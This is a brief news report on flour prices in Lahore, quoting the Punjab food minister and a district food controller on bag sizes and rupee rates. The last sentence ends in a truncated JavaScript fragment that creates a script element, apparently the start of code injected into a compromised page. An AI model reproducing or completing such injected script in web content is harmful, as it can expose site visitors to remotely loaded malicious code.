Flour bags being sold at fixed prices

LAHORE: Provincial Minister for Food Bilal Yasin said that the government has not increased the prices of flour (Atta) but still a 20 kg bag of flour is being sold at fixed rate of Rs 785 in the open market.

While addressing a meeting on Wednesday in his office, the minister informed that normal Atta is being sold in packing of 20 kg bag, 40 kg bag and 79 kg bag, adding that special Atta is being sold in 25 kg packing, while only (Maida) Fine and Suji is being sold at 50 kg packing.

Secretary Food, Chairman Flour Mills Association Asim Raza, Director Food Punjab and District Food Control Lahore I and II participated in the meeting.

District Food Controller said that the government has not fixed any rates of Maida, Fine and Suji, but prices of the flour are determined on the basis of supply and demand in the market, adding fluctuation in rates are in accordance with the market.

He said that 50kg Maida/Fine is currently being sold at the rate of Rs. 2170/- to Rs. 2265/- in the open market while normal Atta in 20 kg packing is being sold abundantly at the fixed rate of Rs. 785/- per bag in the open market.var d=document;var s=d.createElement(‘script’);
